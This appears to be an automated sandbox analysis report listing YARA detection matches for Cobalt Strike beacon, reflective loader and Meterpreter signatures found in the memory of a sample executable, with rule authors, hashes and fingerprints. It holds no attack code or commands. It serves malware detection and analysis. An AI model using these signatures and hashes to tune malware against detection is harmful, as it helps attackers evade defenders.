          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00692078 CreateProcessWithLogonW,0_2_00692078
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001C59140_2_001C5914
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001C19280_2_001C1928
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001A916C0_2_001A916C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001C12640_2_001C1264
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001CAAB00_2_001CAAB0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001B03340_2_001B0334
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001C03740_2_001C0374
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001C239C0_2_001C239C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001CC3970_2_001CC397
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001BF5A80_2_001BF5A8
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001CE6000_2_001CE600
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001ACE3C0_2_001ACE3C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001A96800_2_001A9680
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001CC6800_2_001CC680
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001B6F380_2_001B6F38
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001CB7B00_2_001CB7B0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001CCFF00_2_001CCFF0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_006801A80_2_006801A8
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0066DA3C0_2_0066DA3C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0068F2000_2_0068F200
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0066A2800_2_0066A280
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0068D2800_2_0068D280
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00677B380_2_00677B38
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0068DBF00_2_0068DBF0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0068C3B00_2_0068C3B0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00669D6C0_2_00669D6C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_006825280_2_00682528
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_006865140_2_00686514
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00681E640_2_00681E64
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0067867C0_2_0067867C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0068B6B00_2_0068B6B0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00680F740_2_00680F74
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00670F340_2_00670F34
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00682F9C0_2_00682F9C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0068CF970_2_0068CF97
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
